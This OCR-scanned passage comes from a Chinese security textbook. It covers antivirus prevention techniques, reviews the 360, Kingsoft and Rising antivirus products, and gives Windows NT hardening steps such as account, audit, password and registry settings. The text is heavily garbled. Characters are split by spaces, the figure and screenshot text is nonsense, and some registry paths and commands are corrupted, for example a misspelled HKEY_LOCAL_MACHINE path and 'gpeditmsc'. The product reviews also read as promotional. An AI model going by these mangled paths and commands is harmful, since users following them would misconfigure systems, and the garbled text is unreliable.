要 的 。 计算 机 病毒 预防 是 指 在 病毒 尚未 入 侵 或 刚刚 入 侵 时 ， 就 拦截 、 阻 止 病毒 的 入 侵 或 立 
即 报警 。 目 前 在 预防 病毒 工具 中 采用 的 技术 主要 有 : 

(1) 将 大 量 的 杀毒 软件 汇集 一 体 ， 检 查 是 否 存在 已 知 病毒 。 

(2) 检测 一 些 病毒 经 常 要 改变 的 系统 信息 ， 如 引导 区 、 中 断 向 量 表 、 可 用 内 存 空间 等 ， 
以 确定 是 否 存在 病毒 的 行为 。 

(3) 监测 写 盘 操作 ， 对 引导 区 或 主 引导 区 的 写 操作 报警 。 

(4) 对 计算 机 系统 中 的 文件 形成 一 个 密码 检验 码 和 实现 对 程序 完整 性 的 验证 ， 在 程序 
执行 前 或 定期 对 程序 进行 密码 校 验 ， 如 有 不 匹配 现象 即 报警 。 

(5) 智能 判断 ， 设 计 病 毒 行为 过 程 判 定 知识 库 ， 应 用 人 工 智能 技术 ， 有 效 区 分 正常 程 
序 与 病毒 程序 行为 ， 是 否 误 报警 取决 于 知识 库 选 取 的 合理 性 。 

(6) 智能 监测 ， 设 计 病毒 特征 库 ， 病 毒 行为 知识 库 ， 受 保护 程序 存 取 行 为 知识 库 等 多 
个 知识 库 及 相应 的 可 变 推理 机 。 通 过 调整 推理 机 ， 能 够 对 付 新 类 型 病毒 ， 这 也 是 未 来 预防 
病毒 技术 发 展 的 方向 。 
8.4.3 常用 杀毒 软件 


“杀毒 软件 ”是 由 国产 的 老 一 辈 反 病毒 软件 厂商 ， 如 360 杀毒 、 金 山 毒 霸 、 江 民 、 瑞 
星 等 起 的 名 字 ， 后 来 由 于 和 世界 反 病毒 业 接 轨 统 称 为 “ 反 病 毒 软 件 ” 或 “安全 防护 软件 ”。 
杀毒 软件 ， 也 称 反 病毒 软件 或 防毒 软件 ， 是 用 于 消除 电脑 病毒 、 特 洛 伊 木 马 和 恶意 软件 的 
一 类 软件 。 杀 毒 软件 通常 集成 监控 识别 、 病 毒 扫描 和 清除 以 及 自动 升级 等 功能 ， 有 的 杀毒 
软件 还 带 有 数据 恢复 等 功能 ， 是 计算 机 防御 系统 〈 包 含 杀 毒 软件 ， 防 火 墙 ， 特 洛 伊 木马 和 
其 他 恶意 软件 的 查 杀 程 序 ， 入 侵 预 防 系统 等 ) 的 重要 组 成 部 分 。 

目前 国内 反 病 毒 软件 ， 有 三 大 巨头 : 360 杀毒 、 金 山 毒霸 、 瑞 星 杀 毒 软件 。 评 价 与 介 
绍 如 下 。 


1. 360 杀毒 软件 

360 杀毒 是 永久 免费 、 性 能 超 强 的 杀毒 软件 。 中 国 市 场 占有 率 第 一 。360 杀毒 采用 和 领 
先 的 5 引擎 : 国际 领先 的 常规 反 病毒 引擎 一 一 国际 性 价 比 排名 第 一 的 BitDefender 引擎 + 修 
复 引 擎 +360 云 引 擎 +360QVM 人 工 智 能 引擎 + 小 红 伞 本 地 内 核 ， 强 力 杀毒 ， 全 面 保护 电脑 
安全 ， 拥 有 完善 的 病毒 防护 体系 ， 且 唯一 真正 做 到 彻底 免费 、 无 需 任何 激活 码 。360 杀毒 
轻巧 快速 、 查 杀 能 力 超 强 、 独 有 可 信 程 序数 据 库 ， 防 止 误杀 ， 误 杀 率 远 远 低 于 其 他 杀毒 软 
件 ， 依 托 360 安全 中 心 的 可 信 程 序数 据 库 ， 实 时 校 验 ， 为 电脑 提供 全 面 保护 。 最 新 版 本 特 
有 全 面 防御 U 盘 病 毒 功能 ， 彻 底 剿 灭 各 种 借助 U 盘 传 播 的 病毒 ， 第 一 时 间 阻止 病毒 从 U 
盘 运 行 ， 切 断 病毒 传播 链 。 现 可 查 杀 660 多 万 种 病毒 。 在 最 新 的 VB100 测试 中 ， 双 核 360 
杀毒 大 幅 领先 ， 名 列国 产 杀 软 第 一 。 

2. 金山 毒霸 杀毒 软件 

金山 公司 推出 的 电脑 安全 产品 ， 监 控 、 杀 毒 全 面 、 可 靠 ， 占 用 系统 资源 较 少 。 其 软件 
的 组 合 版 功能 强大 (金山 毒霸 2011、 金 山 网 盾 、 金 山 卫士 )， 集 杀毒 、 监 控 、 防 木马 、 防 
漏洞 为 一 体 ， 是 一 款 具有 市 场 竞争 力 的 杀毒 软件 。 金 山 毒 霸 2011 是 世界 首 款 应 用 “可 信 云 
查 杀 ” 的 杀毒 软件 , 颠覆 了 金山 毒霸 20 年 传统 技术 , 全 面 超越 主动 防御 及 初级 云 安全 等 传 
统 方法 , 采用 本 地 正常 文件 白 名 单 快速 匹配 技术 , 配合 金山 可 信 云 端 体系 , 实现 了 安全 性 、 
检 出 率 与 速度 。 

金山 毒霸 2011 技术 亮点 如 下 。 

(1) 可 信 云 查 杀 : 增强 互联 网 可 信 认 证 ,海量 样 本 自动 分 析 鉴 定 ， 极 速 快速 匹配 查询 。 

(2) 蓝 芯 工 引擎 : 微 特征 识别 (启发 式 查 杀 2.0)， 将 新 病毒 扼杀 于 摇篮 中 ， 针 对 类 型 
病毒 具有 不 同 的 算法 ， 减 少 资源 占用 ， 多 模式 快速 扫描 匹配 技术 ， 超 快 样本 匹配 。 

(3) 白 名 单 优先 技术 : 准确 标记 用 户 电脑 所 有 安全 文件 ， 无 需 逐 一 比 对 病毒 库 ， 大 大 
提高 效率 ， 双 库 双 引 擎 ， 首 家 在 杀毒 软件 中 内 置 安全 文件 库 ， 与 可 信 云 安全 紧密 结合 ， 安 
全 少 误杀 。 

(4) 个 性 功能 体验 : 下 载 保护 、 聊 天 软件 保护 、U 盘 病 毒 免 疫 防 御 、 文 件 粉碎 机 、 自 
定义 安全 区 、 提 升 性 能 、 可 定制 的 免 打 扰 模 式 、 自 动 调节 资源 占用 、 针 对 笔记 本 电源 优化 
使 续航 更 久 。 

(5) 自我 保护 ， 多 于 40 个 自 保护 点 ， 免 疫病 毒 使 杀毒 软件 失效 方法 。 

(6) 全 面 安全 功能 :下载 (支持 迅雷 、QQ 旋风 、 快 车 )、 聊 天 (支持 MSN)、U 盘 安 
全 保护 ， 免 打扰 模式 ， 自 动 调节 资源 占用 。 

3. 瑞星 杀毒 软件 

该 软件 监控 能 力 是 十 分 强大 的 , 但 同时 占用 系统 资源 较 大 。 瑞星 采 用 第 8 代 杀 毒 引 擎 ， 
能 够 快速 、 彻 底 查 杀 大 小 各 种 病毒 ， 这 绝对 是 全 国 顶尖 的 。 但 是 只 使 用 瑞星 的 网 络 监控 不 
行 ， 最 好 再 加 上 瑞星 防火 墙 弥补 缺陷 。 另 外 ， 瑞 星 2009 的 网 页 监控 更 是 疏 而 不 漏 ， 这 是 云 
安全 的 结果 。 

拥有 后 台 查 杀 〈 在 不 影响 用 户 工 作 的 情况 下 进行 病毒 的 处 理 )、 断 点 续 杀 (智能 记录 
上 次 查 杀 完成 文件 ,针对 未 查 杀 的 文件 进行 查 杀 )、 异 步 杀 毒 处 理 (在 用 户 选 择 病 毒 处 理 的 
过 程 中 ,不 中 断 查 杀 进度 ， 提 高 查 杀 效率 )、 空 闲 时 段 查 杀 〈 利 用 用 户 系 统 空闲 时 间 进 行 病 
毒 扫描 )、 嵌 入 式 查 杀 〈 可 以 保护 MSN 等 即时 通信 软件 ， 并 在 MSN 传输 文件 时 进行 传输 
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文件 的 扫描 )、 开 机 查 杀 (在 系统 启动 初期 进行 文件 扫描 ， 以 处 理 随 系统 启动 的 病毒 ) 等 功 
能 ; 并 有 木马 入 侵 拦截 和 木马 行为 防御 ,基于 病毒 行为 的 防护 ,可 以 阻止 未 知 病毒 的 破坏 。 
还 可 以 对 电脑 进行 体检 ， 帮 助 用 户 发 现 安全 隐患 。 并 有 工作 模式 的 选择 ， 家 庭 模 式 为 用 户 
自动 处 理 安全 问题 ， 专 业 模 式 下 用 户 拥有 对 安全 事件 的 处 理 权 。 缺 点 是 卸载 后 注册 表 会 残 
留 一 些 信息 。 


思考 与 练习 
.病毒 的 定义 是 什么 ? 
.举例 说 明 计算 机 病毒 的 危害 。 
、 病毒 隐藏 技术 有 哪些 ? 


.如何 使 用 系统 自身 和 软件 检查 是 否 感染 了 病毒 ? 
.如 何 手动 清除 威 金 病毒 ? 
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第 9 章 操作 系统 安全 配置 方案 


本 章 学 习 目 标 : 

。 了解 Windows NT 的 安全 模型 ; 

。 掌握 操作 系统 常规 安全 措施 ; 

。 掌握 操作 系统 中 级 安全 配置 措施 ; 
。 掌握 操作 系统 高 级 安全 配置 措施 。 


9.1 Windows 操作 系统 


Windows NT (New Technology) 是 微软 公司 第 一 个 真正 意义 上 的 网 络 操作 系统 ， 它 的 
发 展 经 过 NT 3.0、NT 4.0、NT 5.0 和 NT 6.0 等 众多 版 本 ， 并 逐步 占据 了 广大 中 小 网 络 操作 
系统 的 市 场 。 

Windows NT 众多 版 本 的 操作 系统 使 用 了 与 Windows 9x 完全 一 致 的 用 户 界面 和 完全 相 
同 的 操作 方法 ， 使 用 户 使 用 起 来 比较 方便 。 与 Windows 9x 相 比 ，Windows NT 的 网 络 功能 
更 加 强大 并 且 安 全 。 

Windows NT 系统 操作 系统 具有 以 下 三 方面 的 优点 。 

1. 支持 多 种 网 络 协议 

由 于 在 网 络 中 可 能 存在 多 种 客户 机 ， 而 这 些 客户 机 可 能 使 用 了 不 同 的 网 络 协 议 ， 如 
TCP/IP，IPX/SPX 等 。 但 Windows NT 系列 操作 系统 支持 几乎 所 有 常见 的 网 络 协议 。 

2. 内 置 Internet 功能 

随 着 Internet 的 流行 和 TCP/IP 协议 簇 的 标准 化 ，Windows NT 操作 系统 内 置 了 IIS， 可 
以 使 网 络 管理 员 轻 松 地 配置 WWW 和 FTP 等 服务 。 

3. 支持 NTFS 文件 系统 

Windows 9x 所 使 用 的 文件 系统 是 FAT, 在 NT 中 内 置 同 时 支持 FAT 和 NTFS 的 硬盘 分 
区 格式 。 使 用 NTFS 的 好 处 主要 是 可 以 提高 文件 管理 的 安全 性 ， 用 户 可 以 对 NTFS 系统 中 
的 任何 文件 、 目 录 设 置 权限 ， 这 样 当 多 用 户 同时 访问 系统 时 ， 可 以 增加 文件 的 安全 性 。 


9.2 Windows NT 的 系统 结构 


Windows NT 的 结构 是 层次 结构 和 客户 机 /服务 器 结构 的 混合 体 ， 其 系统 结构 如 图 9-1 
所 示 。 执 行者 是 唯一 运行 的 核心 模式 的 部 分 ， 它 分 为 三 层 : 硬件 抽象 层 、 微 内 核 层 和 一 系 
列 实现 基本 系统 服务 的 模块 所 构成 的 层 。 硬 件 抽象 层 为 微 内 核 提 供 硬 件 设备 的 接口 ， 方 便 
系统 移植 。 微 内 核 则 为 硬件 抽象 层 提供 执行 、 中 断 和 异常 处 理 等 支持 。 基 本 系统 服务 的 模 
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块 主要 包括 : 安全 参考 监视 器 、 进 程 管理 、 对 象 执行 服务 、 局 部 过 程 调用 、 虚 拟 DOS 机 控 


制 、 对 象 管理 、 配 置 管理 以 及 内 存 管理 等 。 


被 保护 的 子 系统 也 称 为 服务 器 或 被 保护 服务 ， 以 具有 一 定 特权 的 进程 形式 在 用 户 模式 
下 执行 。 被 保护 的 子 系统 提供 了 应 用 程序 接口 ， 当 一 个 应 用 调用 API 时 ， 消 息 通过 局 部 过 


程 调用 发 送 给 对 应 的 服务 器 ， 服 务 器 则 通过 发 送 消 息 应 答 调用 者 。 


管理 工具 
被 保护 的 服务 由 服务 控制 器 启动 
会 话 NT win32 | | 本 地 安全 | | 安全 账号 | | 服务 县 脱 机 事件 
管理 注册 认证 管理 控制 器 打印 记录 
用 户 模式 
执行 者 核心 模式 
1/O 子 系统 | 安全 参考 | ”进程 区 天 局 部 过 程 | 虚拟 DOS| ”对 象 配置 内 存 
监视 器 | 管理 | 服务 | 调用 | 机 控制 | 管理 | 管理 | 管理 ||| wingows 
lO 管理 管理 
缓冲 管理 图 形 设备 
文件 管理 微 内 核 接口 
图 形 设备 
设备 驱动 驱动 
| 硬件 抽象 层 | 
硬件 | 
加 依赖 硬件 的 部 分 


图 9-1 Windows NT 系统 结构 


Windows NT 提供 的 标准 服务 包括 : 会 话 管理 、NT 注册 、Win32 服务 、 本 地 安全 认证 


和 安全 账户 管理 等 。 


(1) 会 话 管理 服务 是 NT 启动 的 第 一 个 服务 ， 负 责 启 动 DOS 设备 驱动 、 将 子 系统 在 注 


册 表 中 注册 、 初 始 化 动态 链接 库 ， 最 后 启动 NT 注册 服务 。 

(2) NT 注册 服务 是 一 个 注册 进程 ， 负 责 为 交互 式 注册 和 注销 提供 接口 ， 间 
Windows NT 桌面 。 

(3) Win32 服务 为 应 用 程序 提供 API 函数 ， 同 时 提供 图 形 用 户 接 口 并 负责 控制 月 
输入 和 输出 。 


F 管 理 


日 户 的 


(4) 本 地 安全 认证 服务 主要 提供 安全 服务 ， 在 用 户 注册 进程 、 安 全 事件 日 志 进 程 等 本 


地 系统 安全 策略 中 起 着 重要 作用 。 
(5) 安全 账户 管理 服务 主要 管理 用 户 和 用 户 组 账户 ,根据 权限 决定 其 作用 范围 ， 
还 为 认证 服务 提供 支持 。 


9.3 Windows NT 的 安全 模型 


此 外 ， 


在 Windows NT 系统 中 ， 安 全 模型 由 本 地 认证 、 安 全 账户 管理 器 和 安全 参考 监视 器 构 


成 。 此 外 ， 还 包括 注册 、 访 问 控制 和 对 象 安全 服务 等 ， 它 们 之 间 的 相互 作用 和 集成 构成 了 
安全 模型 的 主要 部 分 。Windows NT 系统 的 安全 模型 如 图 9-2 所 示 。 


用 户 模式 


es 核心 模式 


图 9-2 Windows NT 系统 安全 模型 


9.4 ”操作 系统 常规 安全 措施 


操作 系统 常规 安全 措施 主要 介绍 常规 的 操作 系统 安全 配置 ， 包 括 11 条 基本 配置 原则 : 
禁用 Guest 账号 、 限 制 用 户 数 量 、 创 建 多 个 管理 员 账 号 、 管 理 员 账户 改名 、 设 置 陷阱 账户 、 
更 改 默 认 权 限 、 设 置 安全 密码 、 设 置 屏幕 保护 密码 、 使 用 NTFS 分 区 、 安 装 反 病毒 软件 和 
备份 数据 资料 。 

1. 禁用 Guest 账号 

在 计算 机 管理 的 用 户 里 面 把 Guest 账户 停 用 , 任何 时 候 都 不 允许 Guest 账户 登录 系统 。 
为 保险 起 见 ， 最 好 给 Guest 加 一 个 复杂 的 密码 ， 可 以 打开 记事 本 ， 输 入 一 串 包 含 特殊 字符 、 
数字 和 字母 的 长 字符 串 ， 用 其 作为 Guest 账户 的 密码 。 同 时 ， 修 改 Guest 账户 的 属性 ， 设 
置 拒绝 远程 访问 ， 如 图 9-3 所 示 。 

2. 限制 用 户 数量 

去 掉 所 有 的 测试 账户 、 共 享 账 号 和 普通 部 分 账号 等 ， 用 户 组 策略 应 设置 相应 权限 ， 并 
且 经 常 检查 系统 的 账户 ， 删 除 已 经 不 使 用 的 账户 。 上 账户 通常 是 入 侵 系统 的 突破 口 ， 系 统 账 
户 越 多 ， 攻 击 者 得 到 合法 用 户 权 限 的 可 能 性 也 就 越 大 。 

3. 创建 多 个 管理 员 账 号 

虽然 该 措施 表面 上 与 限制 用 户 数据 矛盾 ， 但 实际 上 是 一 致 的 。 创 建 一 个 一 般 用 户 权限 
账户 来 处 理 电子 邮件 及 日 常事 务 , 另 一 个 拥有 Administrator 权限 的 账户 则 只 在 需要 时 使 用 。 
由 于 登录 系统 以 后 ， 用 户 名 和 密码 等 信息 就 存储 于 WinLogon 进程 中 ， 这 时 若 发 生 入 侵 系 
统 行为 将 有 可 能 得 到 登录 用 户 的 密码 ， 因 此 尽量 减少 Administrator 登录 的 时 间 和 次 数 。 
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9-3 ”设置 Guest 账户 属性 


4. 管理 员 账 户 改名 

Windows NT 中 的 Administrator 账户 是 不 能 被 停 用 的 ， 这 意味 着 入 侵 者 可 以 不 断 地 尝 
试 这 个 账户 的 密码 。 因 而 ， 将 Administrator 账户 改名 可 以 有 效 地 防止 这 种 危险 ， 改 名 时 尽 
量 使 用 较为 普通 的 名 字 ， 具 体操 作 方 法 如 图 9-4 所 示 。 


更 改 管理 账户 名 
称 ， 例 如 guestone 


图 9-4 管理 员 账 户 改名 


5. 设置 陷阱 账户 

所 谓 陷阱 账户 是 指 创建 一 个 名 为 Administrator 的 本 地 账户 ， 把 它 的 权限 设置 成 最 低 ， 
可 以 将 该 用 户 隶 属 的 组 修改 成 Guest 组 ， 如 图 9-5 所 示 。 并 为 其 设置 一 个 超级 复杂 的 密码 ， 
入 侵 者 要 破解 这 样 的 陷阱 账户 必须 付出 很 大 的 代价 ， 而 且 破 解 成 功 后 也 没有 任何 实际 应 用 
价值 。 


| ?21x| 
查找 范围 由 ，| 国 ASERVER 司 
肯 Aaninistrators ADSERVER 
辐 3aclmp Operators ADSERYER 
胃 Fower Users ADSERVER 
咖 keplicator ADSERVER 
ADSERYER 
区 = a 本 
检查 名 称 9 
ADSERVER\Guests 
确定 | 取消 | 
A 


图 9-5 修改 隶属 组 


6. 更 改 默 认 权 限 

将 共享 文件 的 权限 从 Everyone 组 改 成 “授权 用 户 ”。Everyone 在 Windows NT 中 意味 
着 任何 有 权 进 入 网 络 的 用 户 都 能 获得 这 些 共享 资料 。 任 何 时 候 都 不 要 把 共享 文件 的 用 户 设 
置 为 Everyone 组 ， 包 括 打印 共享 ， 默 认 的 属性 就 是 Everyone 组 的 ， 一 定 要 进行 修改 。 设 
置 某 文件 夹 共 享 默 认 设置 如 图 9-6 所 示 。 一 般 删 除 Everyone， 添 加 授权 用 户 ， 并 且 根 据 需 
要 设置 该 授权 用 户 的 访问 权限 ， 如 完全 控制 、 更 改 和 读 取 。 

7. 设置 安全 密码 

可 靠 的 密码 对 于 一 个 系统 是 非常 重要 的 。 一 些 网 络 管理 员 创 建 账户 时 通常 使 用 公司 名 
称 、 计 算 机 名 等 易于 猜测 的 字符 作为 用 户 名 ， 然 后 将 这 些 账户 的 密码 设置 得 比较 简单 ， 如 
123456， 甚 至 密码 与 用 户 名 同名 等 ， 显 然 ， 这 将 极 大 地 危害 系统 的 安全 。 

8. 设置 屏幕 保护 密码 

设置 屏幕 保护 密码 是 防止 内 部 人 员 破 坏 系统 的 必要 手段 。 一 般 情况 下 尽量 不 要 使 用 支 
持 3D 或 其 他 大 量 占用 系统 资源 的 屏幕 保护 程序 ， 选 择 黑 屏 就 可 以 了 ， 此 外 ， 所 有 系统 用 
户 所 使 用 的 计算 机 最 好 设置 屏幕 保护 密码 。 
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9. 使 用 NTFS 分 区 

NTFS 文件 系统 具有 比 FAT 和 FAT32 文件 系统 更 高 的 安全 性 ,支持 对 文件 的 访问 权限 
设置 。 因 此 ， 应 优先 考虑 使 用 NTFS 文件 系统 。 

10. 安装 反 病毒 软件 

Windows NT 系统 本 身 不 具备 反 病毒 能 力 ， 为 应 对 病毒 、 木 马 等 恶意 程序 的 威胁 必须 
安装 反 病 毒 软件 。 目 前 ， 主 流 的 反 病 毒 软件 不 仅 能 查 杀 病毒 ， 还 能 查 杀 大 量 木马 、 后 门 等 
恶意 程序 。 需 要 注意 的 是 ， 必 须 经 常 升级 病毒 库 ， 只 有 这 样 才能 查 杀 新 出 现 的 或 者 变异 的 
恶意 程序 。 

11. 备份 数据 资料 

一 旦 系统 资料 被 破坏 ， 备 份 将 是 恢复 资料 的 唯一 途径 。 因 此 ， 必 须 定 期 对 数据 资料 进 
行 备份 。 备份 载体 必须 放置 到 一 个 安全 的 地 方 , 并 确保 不 将 资料 备份 在 同一 台 计 算 机 之 上 。 

tools 的 权限 ?1x| 


取消 ”| ”应 用 8 | 


图 9-6 默认 共享 权限 


9.5 ”操作 系统 中 级 安全 配置 措施 


操作 系统 中 级 安全 配置 措施 主要 介绍 操作 系统 的 安全 策略 配置 ,包括 11 条 基本 配置 原 
则 : 操作 系统 安全 策略 、 关 闭 不 必要 的 服务 、 关 闭 不 必要 的 端口 、 开 启 审核 策略 、 开 局 密 
码 策略 、 开 启 账 户 策略 、 备 份 敏感 文件 、 不 显示 上 次 登录 名 、 禁 止 建立 空 连接 、 禁 止 自动 
播放 和 安装 最 新 安全 补丁 。 

1. 操作 系统 安全 策略 

利用 Windows NT 的 安全 配置 工具 来 配置 安全 策略 、 微 软 提供 了 一 套 基于 管理 控制 台 
的 安全 配置 和 分 析 工 具 ， 可 以 配置 服务 器 的 安全 策略 。 


在 管理 工具 中 可 以 找到 “本 地 安全 策略 ”， 主 界面 如 图 9-7 所 示 。 这 里 可 以 配置 4 类 安 
全 策略 : 账户 策略 、 本 地 策略 、 公 钥 策略 和 卫 安全 策略 。 在 默认 情况 下 ， 这 些 策略 都 是 关 
闭 的 。 


FETE lolx| 
| 操作 他 ”查看 WwW || + 过 | 窗 | 因 | 加 | 国 


公 钥 策略 
名 IP 安全 策略 ,在 本 地 机 器 


岗 PP 安全 策略 ， 在 本 地 机 器 


加 


| [ | 
图 9-7 “本 地 安全 策略 ” 主 界面 


2. 关闭 不 必要 的 服务 

Windows NT 的 终端 服务 和 IIS 服务 等 都 可 能 给 系统 带 来 安全 漏洞 , 为 了 能 够 在 远程 方 
便 地 管理 服务 器 ， 很 多 计算 机 的 终端 服务 都 是 开启 的 ， 如 果 开 启 了 ， 要 确认 已 经 正确 配置 
了 终端 服务 。 有 些 恶 意 的 程序 也 能 以 服务 的 方式 悄悄 地 运行 服务 器 上 的 终端 服务 。 要 留意 
服务 器 上 开启 的 所 有 服务 并 每 天 检查 。Windows NT 作为 服务 器 可 禁用 的 服务 以 及 相关 说 
明 如 表 9-1 所 示 。 


表 9-1 可 禁用 的 服务 列表 


服务 名 说 明 

Computer Browser 维护 网 络 上 计算 机 的 最 新 列表 及 提供 这 个 列表 
Task scheduler 允许 程序 在 指定 时 间 运 行 

Routing and Remote Access 在 局 域 网 及 广域网 环境 中 为 企业 提供 路 由 服务 
Removable storage 管理 可 移动 媒体 、 驱 动 程序 和 库 

Remote Registry Service 允许 远程 注册 表 操 作 

Print Spooler 将 文件 加 载 到 内 存 中 以 便 以 后 打印 

IPSEC Policy Agent 管理 他 安全 策略 及 启动 人 P 安全 驱动 程序 
Distributed Link Tracking Client 当 文 件 在 网 络 域 的 NTFS 卷 中 移动 时 发 送 通 知 
Com+Event System 提供 事件 的 自动 发 布 到 订阅 COM 组 件 


关闭 服务 的 方法 是 选择 “控制 面板 ”| “管理 工具 ”| “服务 ”选项 ， 双 击 选 定 的 服务 ， 
在 弹出 的 服务 属性 对 话 框 中 进行 相应 设置 ， 如 图 9-8 所 示 。 

3， 关 闭 不 必要 的 端口 

开放 的 端口 越 多 ， 也 即 提供 的 服务 越 多 ， 意 味 着 潜在 的 安全 威胁 就 越 大 。 因 此 ， 有 必 
要 限制 本 机 开放 的 端口 数量 , 关闭 不 必要 的 端口 。 首先, 在 他 地 址 设置 窗口 中 单 击 “ 高 级 ” 
按钮 ， 然 后 在 出 现 的 对 话 框 中 切换 到 “选项 ”选项 卡 ， 选 中 其 中 的 “TCP/P 簿 选 ” 单 击 
“属性 ”按钮 ， 进 入 TCP/IP 端口 筛选 设置 界面 ， 如 图 9-9 所 示 。 
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Server 的 屋 性 (本 地 计算 机 ) 区 区 
| 操作 (a) 查看 WW || 全 坊 。 常规 | 登录 “| 故障 恢复 | 依存 关系 | 


服务 名 称 : larmanserver 
服务 ( 纺 yRemote Registry 5Se,.. 


二 Removable Storage 显示 名 称 @@) : F erver 


二 Routing and Remot,,. 

语 %RunAs 5ervice 描述 人 0): 隆基 RFC 支持 、 净 件 、 打 印 以 及 命名 管道 共享 。 
pr eccounts 本 执行 文件 的 路 径 0): 

二 simple Mail Transpo,.. E: WINNT\System32\services. exe 

二 smart Card 

二 ysmart Card Helper 自动 类 型 到 ) : 手动 下 


才 5nake 5ockProxy 5 动 
二 5ystem Event Notifi,,, 手动 
纺 yTask Scheduler 服务 状态 : 


TCPIIP NetBIOS Hel,,, 
pari 3 启动 加 | 信 EW | 亲 j® | a | 


ee pe 当 从 此 处 启动 服务 时 ， 您 可 指定 所 适用 的 启动 参数 。 
erminal 5ervices 

二 Uninterruptible Pow,,, 

红 Utiity Manager 后 动 参数 而) | 

纺 yyMware Tools Service 


4 5| 忽 windows Installer 


| : 取消 ”| 应 用 &) | 


图 9-8 关闭 不 必要 的 服务 


TCP/IP 第 选 ?| x| 


三 渔 


他 全 部 允许 全) 他 全 部 允许 加 ) 
CRO ORR 


添加 ... | 添加 .. | 沃 加 | 
删除 三 ws | wuld) | 


图 9-9 ”启用 TCP/IP 筛选 


4. 开启 审核 策略 
安全 审核 是 Windows NT 最 基本 的 入 侵 检 测 方法 。 当 有 人 尝试 对 系统 进行 某 种 方式 的 


入 侵 时 ， 都 会 被 安全 审核 记录 下 来 。 表 9-2 列 出 了 必须 开启 的 审核 策略 ， 其 他 的 策略 可 以 
根据 需要 增加 。 


表 9-2 必须 开启 的 审核 策略 


策略 设置 策略 设置 
审核 系统 登录 事件 成 功 ， 失 败 审核 策略 更 改 成 功 ， 失 败 
审核 账户 管理 成 功 ， 失 败 审核 特权 使 用 成 功 ， 失 败 
审核 登录 事件 成 功 ， 失 败 审核 系统 事件 成 功 ， 失 败 
审核 对 象 访问 成 功 


国 审 核 谷 录 事 全 
区 训 反对 时 这 间 无 审核 无 审核 


9 C9 审核 策略 
全 用 户 权 利 指派 


加 名 目 录 服 务 访 问 无 审核 无 审核 


由 . 国 安全 选项 固 审 核 特权 使 用 无 审核 无 审核 

由 - 国 公 钥 策略 辆 审核 系统 事件 无 审核 无 审核 

由 蚀 IP 安全 策略 ,在 本 + | 加 审核 帐户 登录 事件 无 审核 无 审核 
区 审核 帐户 管理 


图 9-10 审核 策略 默认 设置 
双击 审核 列表 的 某 一 项 ， 出 现 设置 对 话 框 ， 将 复 选 框 “成 功 ” 和 “失败 ”都 选中 ， 如 


图 9-11 所 示 。 


本 地 安全 策略 设置 


民 成 功 (8) 
加 二 


如 果 域 级 策略 设置 已 定义 ， 它 们 会 葵 代 本 地 策 咯 设置。 
Cue |] we | 


图 9-11 设置 审核 策略 
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克 乡 委 会 页 大 理论 与 笑 践 


5. 开启 密码 策略 
密码 对 系统 安全 是 非常 重要 的 ， 然 而 ， 默 认 情 况 下 本 地 安全 设置 中 的 密码 策略 都 没有 
开启 ， 需 要 开启 的 密码 策略 如 表 9-3 所 示 。 


表 9-3 ”必须 开启 的 密码 策略 列表 


策略 设置 策略 设置 

密码 复杂 性 要 求 启用 密码 最 长 存留 期 5 无 

密码 长 度 最 小 值 6 位 强制 密码 历史 在 
6. 开启 账户 策略 


开启 账户 策略 可 以 有 效 地 防止 字典 式 攻击 ， 其 设置 如 表 9-4 所 示 。 其 中 ， 当 某 个 用 户 
连续 尝试 5 次 登录 失败 后 将 会 自动 锁定 该 账户 ，30 分 钟 后 再 自动 复位 被 锁定 的 账户 。 


表 9-4 必须 开启 的 密码 策略 


策略 设置 策略 设置 
复位 账户 锁定 计数 器 30 分 钟 账户 锁定 阔 值 5 次 
账户 锁定 时 间 30 分 钟 

7. 备份 敏感 文件 


尽管 目前 计算 机 系统 的 硬盘 容量 都 很 大 ， 但 还 是 要 将 一 些 敏感 文件 和 重要 的 用 户 数据 
(文件 、 数 据 表 及 项 目 文件 等 ) 备份 到 另 一 台 安 全 服务 器 中 。 

8. 不 显示 上 次 登录 名 

默认 情况 下 ， 终 端 系统 接 入 服务 器 时 登录 对 话 框 中 将 会 显示 上 次 登录 的 账户 名 ， 本 地 
的 登录 对 话 框 也 有 些 功 能 。 攻 击 者 可 以 因此 得 到 系统 的 用 户 名 信息 ， 进 而 猜测 密码 。 因 此 ， 
建议 将 系统 设置 为 不 显示 上 次 登录 名 ， 其 方法 是 选择 “控制 面板 ”|“ 管 理工 具 ”|“ 本 地 安 
全 策略 ” 在 “安全 选项 ”中 进行 设置 ， 配 置 界面 如 图 9-12 所 示 。 

ETEEEE 二 IDIX 


注册 表 (R) 编辑 (E) 查看 (W) 收藏 (E) 帮助 (由 ) 
由 . 国 Svchost 名 称 


类 型 


| Terminal 5erver ED]Appsetup REG_5z 

外 Time zones BAutoRestartShell REG DWORD 0x00000001 (1) 

a Type 1 Instaler [ab]cachedlogonscount REG_5Z 10 
全 Userinstalable,drivers lab]DebugserverCommand REG_5z no 

上 a a [ab]DefaultDomainName REG_5z ADSERVER 
向 GpExtensions las]DefaultUserName REG_Sz Administrator 
入 | Notify REG_Sz 9 

国 wow .i REG_Sz 

国 windows Script Host [eB]LegalNoticeText REG_5z 
Wuirslressn Covinbina met | Bracewnrciaynirvwarninn RFG DWORN nxnnnnnnne fl14Y = 
| 


| 我 的 电脑 \HKEY_LOCAL_MACHINE\SOFTWARENMicrosoft\Windows NTVCurrentyersionWwinlogon 


图 9-12 配置 不 显示 上 次 登录 名 


另 一 种 方法 是 ， 直 接 设 置 注册 表 键 HKEY_LOCAL MACHINE\Software\Microsoft\ 
WindowsNT\CurrentVersion\Winlogon\DontDisplayLastUserName 的 值 为 1。 


9. 禁止 建立 空 连 接 

默认 情况 下 , 任何 用 户 通过 空 连接 接 入 服务 器 之 后 , 就 可 以 进行 账户 枚 举 并 猜测 密码 ， 
这 可 以 通过 修改 注册 表 来 禁止 , 具体 方法 是 直接 设置 注册 表 键 HREY_ LOCAL MACHINRE\ 
System\CurrentControlSet\Control\LSA\RestrictAnonymous 的 值 为 1。 

10. 禁止 自动 播放 

当前 有 许多 病毒 、 木 马 等 恶意 程序 都 选择 通过 U 盘 等 移动 存储 介质 进行 传播 ， 其 传播 
的 机 理 实际 上 就 是 利用 了 Windows NT 系统 的 自动 播放 功能 。 该 功能 默认 情况 下 是 开启 的 ， 
为 避免 系统 通过 移动 存储 介质 感染 恶意 程序 ， 有 必要 关闭 系统 的 自动 播放 功能 。 

一 种 有 效 地 关闭 自动 播放 功能 的 方法 是 在 命令 行 下 执行 组 策略 编辑 命令 gpeditmsc， 
